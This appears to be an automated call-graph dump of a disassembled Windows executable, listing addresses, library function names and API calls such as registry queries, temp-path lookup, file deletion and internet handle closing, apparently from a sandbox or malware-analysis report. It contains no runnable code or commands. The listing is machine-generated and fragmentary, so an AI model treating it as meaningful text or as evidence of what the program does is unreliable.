34027->34028 34029 4f4cca StringFromGUID2 34028->34029 34030 4f4cee _Immortalize 34029->34030 34031 417910 _Immortalize 77 API calls 34030->34031 34032 4f4d01 34031->34032 34033 4181d0 _Immortalize 77 API calls 34032->34033 34034 4f4d1d 34033->34034 34035 4176e0 codecvt 69 API calls 34034->34035 34036 4f4d2f _Immortalize 34035->34036 34037 4f4d8e _Immortalize 34036->34037 34038 417a20 _Immortalize 77 API calls 34036->34038 34039 44f6c8 __putwch_nolock 5 API calls 34037->34039 34038->34036 34040 4f4db1 34039->34040 34040->33535 34042 41c3f6 34041->34042 34043 41c3cc 34041->34043 34042->33572 34047 5015e0 34043->34047 34046 44fae5 _Immortalize 76 API calls 34046->34042 34050 41c750 34047->34050 34051 41c780 _Immortalize 34050->34051 34054 41cf00 34051->34054 34055 41cf37 _Immortalize _DebugHeapAllocator 34054->34055 34058 41d800 34055->34058 34057 41c3ec 34057->34046 34059 41e630 _Immortalize 77 API calls 34058->34059 34060 41d80f HandleT _Immortalize 34059->34060 34060->34057 34068 41cf70 34061->34068 34063 41ca23 codecvt 34063->33574 34064 41c9e9 codecvt std::_Cnd_initX Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 34064->34063 34071 41cc50 34064->34071 34066->33578 34067->33578 34075 41d870 34068->34075 34070 41cf83 _DebugHeapAllocator 34070->34064 34072 41cc5f 34071->34072 34079 41eb20 34072->34079 34078 41d881 HandleT std::_Cnd_initX _Immortalize 34075->34078 34076 41d8ee 34076->34070 34077 41cc50 77 API calls 34077->34078 34078->34076 34078->34077 34082 40a400 34079->34082 34083 40a40f _Immortalize 34082->34083 34086 4071f0 34083->34086 34085 40a42a 34085->34063 34087 407204 34086->34087 34089 407209 _Immortalize 34086->34089 34088 44f67a std::ios_base::clear 77 API calls 34087->34088 34088->34089 34089->34085 34091 442ff6 34090->34091 34092 442fcc 34090->34092 34091->33583 34096 48fff0 69 API calls 2 library calls 34092->34096 34094 442fec 34095 44fae5 _Immortalize 76 API calls 34094->34095 34095->34091 34096->34094 34098 491ff4 34097->34098 34164 491fea 34097->34164 34174 433e30 34098->34174 34100 44f6c8 __putwch_nolock 5 API calls 34101 492463 34100->34101 34101->33620 34101->33621 34102 492006 _Immortalize 34103 417910 _Immortalize 77 API calls 34102->34103 34104 49203e 34103->34104 34178 433fc0 34104->34178 34164->34100 34173 4911a9 34170->34173 34171 4911f3 34171->33620 34172 491160 102 API calls 34172->34173 34173->34171 34173->34172 34175 433e60 _Immortalize 34174->34175 34209 4364f0 34175->34209 34179 417660 allocator 77 API calls 34178->34179 34180 433ff2 34179->34180 34181 432780 34180->34181 34186 432791 HandleT codecvt std::_Cnd_initX 34181->34186 34210 436527 _Immortalize _DebugHeapAllocator 34209->34210 34213 43a690 34210->34213 34212 433e6d 34212->34102 34216 43a810 34213->34216 34215 43a69f HandleT codecvt 34215->34212 34217 433bf0 allocator 77 API calls 34216->34217 34218 43a84c HandleT codecvt std::_Cnd_initX allocator 34217->34218 34218->34215 34259 405140 77 API calls 34258->34259 34260 48c660 34259->34260 34261 48bd40 86 API calls 34260->34261 34262 48c669 34261->34262 34263 48c80c _Immortalize 34262->34263 34286 41f190 34262->34286 34263->33642 34283->33641 34287 41f1c3 _Immortalize 34286->34287 34358->33658 31820 401fc0 31821 40200b codecvt 31820->31821 31829 40210c codecvt 31821->31829 31832 401030 RaiseException codecvt _Immortalize Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 31821->31832 31823 402047 codecvt 31825 4020b5 codecvt 31823->31825 31833 4cc8c0 31823->31833 31825->31829 31870 4f71a0 80 API calls 3 library calls 31825->31870 31826 402088 31843 44fafc 31826->31843 31830 402097 31856 47f670 31830->31856 31832->31823 31834 4cc8ed _Immortalize 31833->31834 31835 4cc95c GlobalAlloc 31834->31835 31842 4cc8fa codecvt 31834->31842 31836 4cc992 _realloc 31835->31836 31835->31842 31837 4cc9a3 CreateStreamOnHGlobal 31836->31837 31838 4cc9c3 Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 31837->31838 31837->31842 31838->31842 31871 430540 31838->31871 31840 4cc9e8 Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 31840->31842 31877 4cc870 114 API calls 31840->31877 31842->31826 31845 44fb08 _realloc 31843->31845 31844 44fb81 _realloc 31844->31830 31845->31844 31846 457dfc __lock 67 API calls 31845->31846 31855 44fb47 31845->31855 31851 44fb1f ___sbh_find_block 31846->31851 31847 44fb5c RtlFreeHeap 31847->31844 31848 44fb6e 31847->31848 32326 454477 69 API calls __getptd_noexit 31848->32326 31850 44fb73 GetLastError 31850->31844 31852 44fb39 31851->31852 32324 457e5f __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 31851->32324 32325 44fb52 LeaveCriticalSection __freefls@4 31852->32325 31855->31844 31855->31847 31857 47f6a5 std::_Iterator_base::_Iterator_base 31856->31857 31858 47f75a 31856->31858 32327 41eea0 31857->32327 31859 44f6c8 __putwch_nolock 5 API calls 31858->31859 31861 47f785 31859->31861 31861->31825 31862 47f748 32337 41ef60 31862->32337 31864 47f6c8 _memset 31864->31862 32333 41ede0 31864->32333 31867 47f727 31867->31862 32340 452133 69 API calls _vscan_fn 31867->32340 31868 41ede0 RegQueryValueExW 31868->31867 31870->31829 31872 43057c 31871->31872 31876 430572 codecvt 31871->31876 31878 44f76f 31872->31878 31876->31840 31877->31842 31879 44f779 31878->31879 31881 4305a1 31879->31881 31886 44f795 std::bad_alloc::bad_alloc 31879->31886 31893 44fbd9 31879->31893 31910 456ffc 7 API calls __decode_pointer 31879->31910 31881->31876 31890 430710 31881->31890 31883 44f7bb 31914 417c20 69 API calls std::exception::exception 31883->31914 31885 44f7c5 31915 456a4c RaiseException 31885->31915 31886->31883 31911 44fae5 31886->31911 31889 44f7d3 32123 42fbc0 31890->32123 31894 44fc8c 31893->31894 31906 44fbeb 31893->31906 31968 456ffc 7 API calls __decode_pointer 31894->31968 31896 44fc92 31969 454477 69 API calls __getptd_noexit 31896->31969 31901 44fc48 RtlAllocateHeap 31901->31906 31903 44fc78 31966 454477 69 API calls __getptd_noexit 31903->31966 31906->31901 31906->31903 31907 44fc7d 31906->31907 31909 44fc84 31906->31909 31916 458a9e 69 API calls 2 library calls 31906->31916 31917 4588f3 31906->31917 31961 45799c 31906->31961 31964 44fb8a 69 API calls 4 library calls 31906->31964 31965 456ffc 7 API calls __decode_pointer 31906->31965 31967 454477 69 API calls __getptd_noexit 31907->31967 31909->31879 31910->31879 32043 44faa9 31911->32043 31913 44faf2 31913->31883 31914->31885 31915->31889 31916->31906 31918 458907 31917->31918 31919 458a62 31918->31919 31970 46590f 69 API calls __wcsnicmp 31918->31970 31919->31906 31921 458929 31922 458a67 GetStdHandle 31921->31922 31971 46590f 69 API calls __wcsnicmp 31921->31971 31922->31919 31923 458a75 31922->31923 31923->31919 31925 458a7a _strlen 31923->31925 31928 458a8e WriteFile 31925->31928 31926 45893a 31926->31922 31927 45894c 31926->31927 31927->31919 31972 457024 69 API calls __wcsnicmp 31927->31972 31928->31919 31930 45896e 31931 458975 31930->31931 31932 458982 GetModuleFileNameA 31930->31932 32003 45567d 10 API calls 3 library calls 31931->32003 31933 4589a0 31932->31933 31939 4589c6 _strlen 31932->31939 32004 457024 69 API calls __wcsnicmp 31933->32004 31935 45897f 31935->31932 31937 4589b0 31938 4589b7 31937->31938 31937->31939 32005 45567d 10 API calls 3 library calls 31938->32005 31940 458a0b 31939->31940 32006 46585a 69 API calls __wcsnicmp 31939->32006 31973 4657e6 69 API calls __wcsnicmp 31940->31973 31943 4589c3 31943->31939 31944 458a19 31946 458a20 31944->31946 31947 458a2d 31944->31947 32008 45567d 10 API calls 3 library calls 31946->32008 31974 4657e6 69 API calls __wcsnicmp 31947->31974 31948 4589f3 31948->31940 31949 4589fa 31948->31949 32007 45567d 10 API calls 3 library calls 31949->32007 31953 458a2a 31953->31947 31954 458a3e 31956 458a45 31954->31956 31957 458a52 31954->31957 31955 458a06 31955->31940 32009 45567d 10 API calls 3 library calls 31956->32009 31975 46567d 31957->31975 31960 458a4f 31960->31957 32039 457971 GetModuleHandleW 31961->32039 31964->31906 31965->31906 31966->31907 31967->31909 31968->31896 31969->31909 31970->31921 31971->31926 31972->31930 31973->31944 31974->31954 32010 45716e 31975->32010 31978 4656a0 LoadLibraryA 31980 4656b5 GetProcAddress 31978->31980 31981 4657ca 31978->31981 31979 46572e 31998 465752 31979->31998 32025 457177 TlsGetValue 31979->32025 31980->31981 31983 4656cb 31980->31983 31981->31919 31982 46577d 31987 457177 __decode_pointer 7 API calls 31982->31987 32013 4570fc TlsGetValue 31983->32013 31984 457177 __decode_pointer 7 API calls 31995 465795 31984->31995 31987->31981 31990 457177 __decode_pointer 7 API calls 31990->31998 31991 4570fc __encode_pointer 7 API calls 31992 4656e6 GetProcAddress 31991->31992 31993 4570fc __encode_pointer 7 API calls 31992->31993 31994 4656fb GetProcAddress 31993->31994 31996 4570fc __encode_pointer 7 API calls 31994->31996 31995->31982 31997 457177 __decode_pointer 7 API calls 31995->31997 31999 465710 31996->31999 31997->31982 31998->31982 31998->31984 31999->31979 32000 46571a GetProcAddress 31999->32000 32001 4570fc __encode_pointer 7 API calls 32000->32001 32002 465728 32001->32002 32002->31979 32003->31935 32004->31937 32005->31943 32006->31948 32007->31955 32008->31953 32009->31960 32011 4570fc __encode_pointer 7 API calls 32010->32011 32012 457175 32011->32012 32012->31978 32012->31979 32014 457135 GetModuleHandleW 32013->32014 32015 457114 32013->32015 32017 457145 32014->32017 32018 457150 GetProcAddress 32014->32018 32015->32014 32016 45711e TlsGetValue 32015->32016 32021 457129 32016->32021 32037 457918 Sleep GetModuleHandleW 32017->32037 32020 45712d 32018->32020 32023 457160 RtlEncodePointer 32020->32023 32024 457168 GetProcAddress 32020->32024 32021->32014 32021->32020 32022 45714b 32022->32018 32022->32024 32023->32024 32024->31991 32026 4571b0 GetModuleHandleW 32025->32026 32027 45718f 32025->32027 32028 4571c0 32026->32028 32029 4571cb GetProcAddress 32026->32029 32027->32026 32030 457199 TlsGetValue 32027->32030 32038 457918 Sleep GetModuleHandleW 32028->32038 32036 4571a8 32029->32036 32032 4571a4 32030->32032 32032->32026 32032->32036 32033 4571c6 32033->32029 32034 4571e3 32033->32034 32034->31990 32035 4571db RtlDecodePointer 32035->32034 32036->32034 32036->32035 32037->32022 32038->32033 32040 457985 GetProcAddress 32039->32040 32041 45799a ExitProcess 32039->32041 32040->32041 32042 457995 32040->32042 32042->32041 32044 44fab5 _realloc 32043->32044 32051 4579b4 32044->32051 32050 44fad6 _realloc 32050->31913 32075 457dfc 32051->32075 32053 44faba 32054 44f9be 32053->32054 32055 457177 __decode_pointer 7 API calls 32054->32055 32056 44f9d2 32055->32056 32057 457177 __decode_pointer 7 API calls 32056->32057 32058 44f9e2 32057->32058 32069 44fa65 32058->32069 32120 457875 70 API calls 5 library calls 32058->32120 32060 44fa00 32061 44fa4c 32060->32061 32064 44fa2a 32060->32064 32065 44fa1b 32060->32065 32062 4570fc __encode_pointer 7 API calls 32061->32062 32063 44fa5a 32062->32063 32066 4570fc __encode_pointer 7 API calls 32063->32066 32068 44fa24 32064->32068 32064->32069 32121 4577d5 75 API calls _realloc 32065->32121 32066->32069 32068->32064 32072 44fa40 32068->32072 32122 4577d5 75 API calls _realloc 32068->32122 32074 44fadf LeaveCriticalSection _Immortalize 32069->32074 32071 44fa3a 32071->32069 32071->32072 32073 4570fc __encode_pointer 7 API calls 32072->32073 32073->32061 32074->32050 32076 457e24 EnterCriticalSection 32075->32076 32077 457e11 32075->32077 32076->32053 32082 457d39 32077->32082 32079 457e17 32079->32076 32108 457948 69 API calls 3 library calls 32079->32108 32081 457e23 32081->32076 32083 457d45 _realloc 32082->32083 32084 457d6b 32083->32084 32109 458a9e 69 API calls 2 library calls 32083->32109 32093 457d7b _realloc 32084->32093 32110 457744 32084->32110 32087 457d5a 32089 4588f3 __NMSG_WRITE 69 API calls 32087->32089 32090 457d61 32089->32090 32094 45799c __mtinitlocknum 3 API calls 32090->32094 32091 457d8d 32116 454477 69 API calls __getptd_noexit 32091->32116 32092 457d9c 32096 457dfc __lock 69 API calls 32092->32096 32093->32079 32094->32084 32097 457da3 32096->32097 32098 457dd7 32097->32098 32099 457dab 32097->32099 32100 44fafc ___free_lc_time 69 API calls 32098->32100 32117 46561d InitializeCriticalSectionAndSpinCount _realloc 32099->32117 32103 457dc8 32100->32103 32102 457db6 32102->32103 32104 44fafc ___free_lc_time 69 API calls 32102->32104 32119 457df3 LeaveCriticalSection __freefls@4 32103->32119 32106 457dc2 32104->32106 32118 454477 69 API calls __getptd_noexit 32106->32118 32108->32081 32109->32087 32112 45774d 32110->32112 32111 44fbd9 _malloc 68 API calls 32111->32112 32112->32111 32113 457783 32112->32113 32114 457764 Sleep 32112->32114 32113->32091 32113->32092 32115 457779 32114->32115 32115->32112 32115->32113 32116->32093 32117->32102 32118->32103 32119->32093 32120->32060 32121->32068 32122->32071 32124 42fbf0 _Immortalize 32123->32124 32135 4175c0 32124->32135 32126 42fc1f _Immortalize 32138 4cc800 32126->32138 32128 42fc40 32142 417910 32128->32142 32152 417580 32135->32152 32139 4cc80e 32138->32139 32141 4cc81f _wcscpy 32138->32141 32139->32141 32161 4f8180 32139->32161 32141->32128 32262 417880 32142->32262 32145 4181d0 32146 4181df 32145->32146 32315 4181b0 32146->32315 32149 4176e0 32321 4178c0 32149->32321 32153 417595 _Immortalize _DebugHeapAllocator 32152->32153 32156 417e70 32153->32156 32155 4175a9 32155->32126 32157 417e83 32156->32157 32158 417e81 codecvt std::ios_base::clear 32156->32158 32157->32158 32160 418000 69 API calls __mbstowcs_l 32157->32160 32158->32155 32160->32158 32162 4f81f9 32161->32162 32165 4f81b1 _Immortalize 32161->32165 32176 44f6c8 32162->32176 32164 4f8211 32164->32141 32166 4175c0 _Immortalize 69 API calls 32165->32166 32167 4f81c2 32166->32167 32171 4f80e0 32167->32171 32169 4f81dd _wcscpy 32170 4176e0 codecvt 69 API calls 32169->32170 32170->32162 32184 4f78f0 32171->32184 32175 4f810b _Immortalize 32175->32169 32177 44f6d0 32176->32177 32178 44f6d2 IsDebuggerPresent 32176->32178 32177->32164 32261 462ed7 32178->32261 32181 456fb4 SetUnhandledExceptionFilter UnhandledExceptionFilter 32182 456fd1 __invoke_watson 32181->32182 32183 456fd9 GetCurrentProcess TerminateProcess 32181->32183 32182->32183 32183->32164 32222 4f7700 32184->32222 32187 4f797a 32188 4f7a69 32187->32188 32189 4f7a87 _Immortalize 32187->32189 32244 422290 77 API calls _Immortalize 32188->32244 32204 417910 _Immortalize 77 API calls 32189->32204 32190 4f799f 32195 495d00 80 API calls 32190->32195 32191 4f79bf 32243 4f77c0 81 API calls 3 library calls 32191->32243 32192 4f796b 32226 495d00 32192->32226 32193 4f7985 32199 495d00 80 API calls 32193->32199 32194 4f79f4 GetTempPathW 32194->32187 32205 4f7a1d _Immortalize 32194->32205 32200 4f79ae 32195->32200 32199->32187 32200->32187 32200->32191 32201 4f79ce 32206 495d00 80 API calls 32201->32206 32211 4f79e6 32201->32211 32202 4f7a72 32245 4130d0 32202->32245 32208 4f7aa5 32204->32208 32209 417910 _Immortalize 77 API calls 32205->32209 32206->32211 32207 4f79f2 32207->32187 32212 4181d0 _Immortalize 77 API calls 32208->32212 32210 4f7a3b 32209->32210 32214 4181d0 _Immortalize 77 API calls 32210->32214 32211->32194 32211->32207 32213 4f7abb 32212->32213 32215 4176e0 codecvt 69 API calls 32213->32215 32216 4f7a51 32214->32216 32217 4f7a85 _Immortalize 32215->32217 32218 4176e0 codecvt 69 API calls 32216->32218 32219 44f6c8 __putwch_nolock 5 API calls 32217->32219 32218->32187 32220 4f7aed 32219->32220 32221 4f7bc0 111 API calls 3 library calls 32220->32221 32221->32175 32223 4f772b 32222->32223 32224 4f7715 32222->32224 32223->32187 32223->32190 32223->32191 32223->32192 32223->32193 32223->32194 32224->32223 32248 494f20 32224->32248 32227 495d33 _memset 32226->32227 32228 495d5b SHGetFolderPathW 32227->32228 32229 495df0 32228->32229 32230 495d84 32228->32230 32251 417a20 32229->32251 32232 495d9b PathRemoveBackslashW 32230->32232 32233 495d8c PathAddBackslashW 32230->32233 32235 495da8 _Immortalize 32232->32235 32233->32235 32234 495dee 32236 44f6c8 __putwch_nolock 5 API calls 32234->32236 32238 417910 _Immortalize 77 API calls 32235->32238 32237 495e1a 32236->32237 32237->32187 32239 495dc6 32238->32239 32240 4181d0 _Immortalize 77 API calls 32239->32240 32241 495ddc 32240->32241 32242 4176e0 codecvt 69 API calls 32241->32242 32242->32234 32243->32201 32244->32202 32257 4130a0 32245->32257 32249 494af0 6 API calls 32248->32249 32250 494f28 32249->32250 32250->32223 32252 417a34 32251->32252 32255 417a39 _Immortalize 32251->32255 32253 44f67a std::ios_base::clear 77 API calls 32252->32253 32253->32255 32254 417a99 std::ios_base::clear 32254->32234 32255->32254 32256 4179f0 _Immortalize 69 API calls 32255->32256 32256->32254 32258 4130b0 _Immortalize 32257->32258 32259 412fc0 _Immortalize 77 API calls 32258->32259 32260 4130c0 32259->32260 32260->32217 32261->32181 32263 417895 _Immortalize _DebugHeapAllocator 32262->32263 32264 417e70 codecvt 69 API calls 32263->32264 32265 4178a9 32264->32265 32268 417850 32265->32268 32269 417860 _Immortalize 32268->32269 32272 4177a0 32269->32272 32271 417870 32271->32145 32273 4177b3 std::locale::_Locimp::_Addfac 32272->32273 32274 4177ba _Immortalize 32273->32274 32275 4177dc 32273->32275 32290 4180c0 32274->32290 32281 417ef0 32275->32281 32278 4177da std::ios_base::clear 32278->32271 32279 4177ea _Immortalize 32279->32278 32303 418000 69 API calls __mbstowcs_l 32279->32303 32282 417f01 std::ios_base::clear 32281->32282 32283 417f0b 32282->32283 32312 44f642 77 API calls 3 library calls 32282->32312 32285 417f16 32283->32285 32288 417f2b 32283->32288 32304 417cf0 32285->32304 32286 417f29 std::ios_base::clear 32286->32279 32288->32286 32289 417e70 codecvt 69 API calls 32288->32289 32289->32286 32291 4180d1 _Immortalize 32290->32291 32292 4180db _Immortalize 32291->32292 32313 44f67a 77 API calls 3 library calls 32291->32313 32294 418124 32292->32294 32295 4180ff 32292->32295 32297 417ef0 std::ios_base::clear 77 API calls 32294->32297 32296 417a20 _Immortalize 77 API calls 32295->32296 32298 418114 32296->32298 32301 418132 _Immortalize 32297->32301 32299 417a20 _Immortalize 77 API calls 32298->32299 32300 418122 std::ios_base::clear 32299->32300 32300->32278 32301->32300 32314 418000 69 API calls __mbstowcs_l 32301->32314 32303->32278 32305 417d30 std::ios_base::clear 32304->32305 32306 417cd0 allocator 77 API calls 32305->32306 32307 417d9d _Immortalize 32306->32307 32309 418000 codecvt 69 API calls 32307->32309 32311 417e23 32307->32311 32308 417e70 codecvt 69 API calls 32310 417e32 std::ios_base::clear 32308->32310 32309->32311 32310->32286 32311->32308 32314->32300 32318 418180 32315->32318 32319 4180c0 allocator 77 API calls 32318->32319 32320 41819b 32319->32320 32320->32149 32322 417e70 codecvt 69 API calls 32321->32322 32323 417728 32322->32323 32323->31876 32324->31852 32325->31855 32326->31850 32328 41eea9 32327->32328 32328->32328 32329 41eeb1 RegOpenKeyExW 32328->32329 32330 41eed9 32329->32330 32332 41eee1 32329->32332 32341 41ef10 32330->32341 32332->31864 32334 41ede9 32333->32334 32334->32334 32335 41edf1 RegQueryValueExW 32334->32335 32336 41ee2b 32335->32336 32336->31867 32336->31868 32338 41ef10 RegCloseKey 32337->32338 32339 41ef6f 32338->32339 32339->31858 32340->31862 32342 41ef40 32341->32342 32343 41ef28 RegCloseKey 32341->32343 32342->32332 32343->32342 35748 423ad0 35749 423afc 35748->35749 35753 423b26 35748->35753 35754 4f8400 35749->35754 35751 423b1c 35752 44fae5 _Immortalize 76 API calls 35751->35752 35752->35753 35755 4f8430 _Immortalize 35754->35755 35756 4175c0 _Immortalize 69 API calls 35755->35756 35757 4f844d InitializeCriticalSection 35756->35757 35757->35751 32565 42a0e0 32566 4181d0 _Immortalize 77 API calls 32565->32566 32567 42a114 32566->32567 32580 49f850 32567->32580 32576 4176e0 codecvt 69 API calls 32577 42a189 32576->32577 32578 4178c0 codecvt 69 API calls 32577->32578 32579 42a198 32578->32579 32581 49f88a 32580->32581 32582 49f91f 32581->32582 32614 405260 32581->32614 32585 44f6c8 __putwch_nolock 5 API calls 32582->32585 32587 42a11f 32585->32587 32586 409810 _Immortalize 77 API calls 32588 49f8c8 32586->32588 32594 4098d0 32587->32594 32589 4178c0 codecvt 69 API calls 32588->32589 32591 49f8d4 _Immortalize 32589->32591 32590 49f8f0 32593 4176e0 codecvt 69 API calls 32590->32593 32591->32590 32618 49f700 32591->32618 32593->32582 32689 417620 32594->32689 32597 4130d0 _Immortalize 77 API calls 32598 409924 32597->32598 32599 417620 allocator 77 API calls 32598->32599 32600 40992d 32599->32600 32601 4178c0 codecvt 69 API calls 32600->32601 32602 409942 32601->32602 32603 409810 32602->32603 32604 40983e _Immortalize 32603->32604 32695 40a3c0 32604->32695 32607 49e5b0 32608 49e5bc _Immortalize 32607->32608 32609 49e5d3 _Immortalize 32607->32609 32610 49e5cc SetFileAttributesW 32608->32610 32611 49e5de DeleteFileW 32609->32611 32610->32609 32612 49e5e9 GetLastError 32611->32612 32613 42a17a 32611->32613 32612->32613 32613->32576 32615 40529b allocator 32614->32615 32643 406b90 32615->32643 32649 49e7e0 32618->32649 32620 44f6c8 __putwch_nolock 5 API calls 32622 49f83f 32620->32622 32621 49f733 32623 49f81a 32621->32623 32625 405260 77 API calls 32621->32625 32642 49f73d 32621->32642 32622->32590 32653 49e610 32623->32653 32626 49f778 32625->32626 32627 409810 _Immortalize 77 API calls 32626->32627 32628 49f794 32627->32628 32629 4178c0 codecvt 69 API calls 32628->32629 32630 49f7a0 _Immortalize 32629->32630 32631 49f7de 32630->32631 32632 49f700 81 API calls 32630->32632 32633 49e7e0 _Immortalize 71 API calls 32631->32633 32634 49f7bc 32632->32634 32635 49f7e9 32633->32635 32634->32631 32636 49f7c6 32634->32636 32637 49f80b 32635->32637 32638 49f7f3 32635->32638 32640 4176e0 codecvt 69 API calls 32636->32640 32639 4176e0 codecvt 69 API calls 32637->32639 32641 4176e0 codecvt 69 API calls 32638->32641 32639->32623 32640->32642 32641->32642 32642->32620 32644 406ba5 _Immortalize _DebugHeapAllocator 32643->32644 32645 417e70 codecvt 69 API calls 32644->32645 32646 406bb9 32645->32646 32647 4180c0 allocator 77 API calls 32646->32647 32648 4052b0 32647->32648 32648->32586 32650 49e7f2 _Immortalize 32649->32650 32659 454d7b 32650->32659 32687 416a30 32653->32687 32655 49e621 CreateDirectoryW 32656 49e631 32655->32656 32657 49e642 32655->32657 32656->32657 32658 49e637 GetLastError 32656->32658 32657->32642 32658->32657 32662 454cf2 32659->32662 32663 454d23 32662->32663 32664 454cff 32662->32664 32663->32664 32665 454d2c GetFileAttributesW 32663->32665 32680 45448a 69 API calls __getptd_noexit 32664->32680 32667 454d3a GetLastError 32665->32667 32672 454d50 32665->32672 32683 45449d 69 API calls 3 library calls 32667->32683 32668 454d04 32681 454477 69 API calls __getptd_noexit 32668->32681 32671 454d0b 32682 4557a5 7 API calls 2 library calls 32671->32682 32676 454d1b 32672->32676 32685 45448a 69 API calls __getptd_noexit 32672->32685 32674 454d46 32684 454477 69 API calls __getptd_noexit 32674->32684 32676->32621 32678 454d63 32686 454477 69 API calls __getptd_noexit 32678->32686 32680->32668 32681->32671 32683->32674 32684->32676 32685->32678 32686->32674 32688 416a3f _Immortalize 32687->32688 32688->32655 32690 417633 _DebugHeapAllocator 32689->32690 32691 417e70 codecvt 69 API calls 32690->32691 32692 41763f 32691->32692 32693 4180c0 allocator 77 API calls 32692->32693 32694 409908 32693->32694 32694->32597 32696 40a3d1 _Immortalize 32695->32696 32697 417e70 codecvt 69 API calls 32696->32697 32698 40a3e5 32697->32698 32699 4177a0 std::locale::_Locimp::_Addfac 77 API calls 32698->32699 32700 409853 32699->32700 32700->32607 32701 4231e0 32704 4edd10 32701->32704 32705 4edd2d 32704->32705 32706 4edd20 InternetCloseHandle 32704->32706 32707 4edd35 InternetCloseHandle 32705->32707 32708 4231ef 32705->32708 32706->32705 32707->32708 35116 4041f0 35117 404211 35116->35117 35125 40420c 35116->35125 35118 40423f 35117->35118 35252 4f1cb0 121 API calls 3 library calls 35117->35252 35120 404282 35118->35120 35118->35125 35126 4f3180 35118->35126 35121 4042c2 35120->35121 35120->35125 35175 4f3900 35120->35175 35121->35125 35253 403620 117 API calls 35121->35253 35127 4f31b9 _Immortalize 35126->35127 35128 4175c0 _Immortalize 69 API calls 35127->35128 35129 4f31c2 35128->35129 35130 4f31cf _Immortalize 35129->35130 35131 4f320c 35129->35131 35134 417910 _Immortalize 77 API calls 35130->35134 35132 416600 111 API calls 35131->35132 35133 4f321e 35132->35133 35254 4f2770 35133->35254 35135 4f31e4 35134->35135 35137 4181d0 _Immortalize 77 API calls 35135->35137 35141 4f31f4 35137->35141 35138 4f322c 35139 4f3233 35138->35139 35140 4f3251 35138->35140 35142 4176e0 codecvt 69 API calls 35139->35142 35270 4f2350 90 API calls 35140->35270 35144 4176e0 codecvt 69 API calls 35141->35144 35172 4f3249 35142->35172 35146 4f3200 SysFreeString 35144->35146 35145 4f325c 35147 4f326b _Immortalize 35145->35147 35271 4f2370 90 API calls 2 library calls 35145->35271 35146->35133 35151 417910 _Immortalize 77 API calls 35147->35151 35149 44f6c8 __putwch_nolock 5 API calls 35150 4f339d 35149->35150 35150->35120 35152 4f3287 35151->35152 35153 501ce0 77 API calls 35152->35153 35154 4f329e 35153->35154 35155 501530 77 API calls 35154->35155 35156 4f32a5 35155->35156 35157 4224b0 codecvt 69 API calls 35156->35157 35158 4f32da 35157->35158 35159 4176e0 codecvt 69 API calls 35158->35159 35160 4f32e9 35159->35160 35161 4f334e 35160->35161 35272 416a10 VariantInit 35160->35272 35275 4049b0 76 API calls _Immortalize 35161->35275 35164 4f3353 35276 4f30e0 131 API calls _Immortalize 35164->35276 35166 4f3342 35274 417430 VariantClear 35166->35274 35168 4f3369 35170 4176e0 codecvt 69 API calls 35168->35170 35169 4f32f7 35169->35166 35171 404820 _Immortalize 76 API calls 35169->35171 35170->35172 35173 4f333b 35171->35173 35172->35149 35273 4048a0 77 API calls 2 library calls 35173->35273 35180 4f3938 35175->35180 35176 4f3da4 35188 4f3e6c 35176->35188 35373 416a50 35176->35373 35177 4f3951 35179 44f6c8 __putwch_nolock 5 API calls 35177->35179 35178 4f3ab5 _memset codecvt 35178->35176 35492 416a10 VariantInit 35178->35492 35183 4f3ec8 35179->35183 35180->35177 35180->35178 35365 4d5110 35180->35365 35183->35121 35185 4f3dc9 _Immortalize 35190 417910 _Immortalize 77 API calls 35185->35190 35188->35177 35499 4efd20 PostMessageW GetParent SendMessageW _Immortalize 35188->35499 35189 4f3995 35481 49c910 124 API calls 35189->35481 35196 4f3dee 35190->35196 35192 4f3c81 SHBrowseForFolderW 35193 4f3ce7 SHGetPathFromIDListW 35192->35193 35194 4f3d92 35192->35194 35193->35194 35199 4f3d03 35193->35199 35495 417430 VariantClear 35194->35495 35378 4f2a70 35196->35378 35197 4f3c34 _wcscpy 35197->35192 35202 4f3d0d StrStrIW 35199->35202 35204 4f3d1f PathAddBackslashW 35202->35204 35207 4f3d36 _wcscat 35202->35207 35203 4176e0 codecvt 69 API calls 35214 4f3e23 _Immortalize 35203->35214 35204->35207 35205 4f39a2 35206 4f3a08 _Immortalize 35205->35206 35482 416210 GetParent _DebugHeapAllocator 35205->35482 35215 417910 _Immortalize 77 API calls 35206->35215 35493 4169e0 SysAllocString VariantClear RaiseException 35207->35493 35210 4f3e5a 35498 417300 SysFreeString 35210->35498 35212 4f39d4 35483 416be0 GetWindowLongW 35212->35483 35213 4f3d58 35494 417430 VariantClear 35213->35494 35214->35210 35496 415f90 SysFreeString SysAllocString RaiseException Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 35214->35496 35218 4f3a24 35215->35218 35226 501ce0 77 API calls 35218->35226 35219 4f39db 35484 416210 GetParent _DebugHeapAllocator 35219->35484 35220 4f3e4b 35497 415f50 SysStringByteLen SysAllocStringByteLen SysAllocStringByteLen 35220->35497 35224 4f3a01 35485 415ff0 SetWindowLongW 35224->35485 35227 4f3a42 35226->35227 35486 5018f0 77 API calls codecvt 35227->35486 35229 4f3a49 35230 4176e0 codecvt 69 API calls 35229->35230 35231 4f3a5b 35230->35231 35232 4f3ac9 35231->35232 35236 4f3a61 _Immortalize Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 35231->35236 35233 417660 allocator 77 API calls 35232->35233 35237 4f3af0 _Immortalize 35233->35237 35234 4f3bf1 35235 4176e0 codecvt 69 API calls 35234->35235 35235->35178 35236->35178 35487 404ae0 77 API calls _Immortalize 35236->35487 35237->35234 35238 4175c0 _Immortalize 69 API calls 35237->35238 35240 4f3b52 35238->35240 35489 405370 111 API calls __CxxThrowException@8 35240->35489 35241 4f3aae 35488 4f9110 126 API calls 5 library calls 35241->35488 35244 4f3b6b 35490 4051a0 77 API calls 35244->35490 35246 4f3ba4 35247 4181d0 _Immortalize 77 API calls 35246->35247 35248 4f3bcd 35247->35248 35491 4f0b90 84 API calls _Immortalize 35248->35491 35250 4f3be5 35251 4176e0 codecvt 69 API calls 35250->35251 35251->35234 35252->35118 35253->35125 35255 404820 _Immortalize 76 API calls 35254->35255 35256 4f279d _Immortalize 35255->35256 35257 4f283b codecvt 35256->35257 35277 4f06e0 6 API calls 3 library calls 35256->35277 35257->35138 35259 4f27e3 35259->35257 35278 416a10 VariantInit 35259->35278 